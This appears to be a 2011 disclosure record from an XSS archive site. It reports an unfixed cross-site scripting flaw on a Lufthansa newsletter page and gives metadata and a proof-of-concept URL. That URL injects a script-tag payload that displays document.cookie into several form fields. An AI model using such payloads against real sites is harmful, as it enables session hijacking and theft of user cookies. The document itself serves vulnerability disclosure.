Security researcher SeeMe, has submitted on 02/11/2011 a cross-site-scripting (XSS) vulnerability affecting newsletter.lufthansa.com, which at the time of submission ranked 1967 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 02/11/2011. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 02/11/2011 |
Date published: 02/11/2011 |
Fixed? Mail us! | Status: UNFIXED |
Author: SeeMe |
Domain: newsletter.lufthansa.com |
Category: XSS |
Pagerank: 1967 |
URL: https://newsletter.lufthansa.com/servlet/campaignrespondent?_ID_=lh.6059&EMAIL_ADDRESS=%22%3E%3Cscri pt%3Ealert%28document.cookie%29%3C/script%3E&EMAIL_ADDRESS2=%22%3E%3Cscript%3Ealert%28document.cooki e%29%3C/script%3E&GENDER=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&TITLE=%22%3E%3Csc ript%3Ealert%28document.cookie%29%3C/script%3E&FIRST_NAME=%22%3E%3Cscript%3Ealert%28document.cookie% 29%3C/script%3E&SURNAME=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&COUNTRY_CODE=BE&LA NGUAGE=E&P=ID__EN_ENR_0310# |
Click here to view the mirror
|
|
|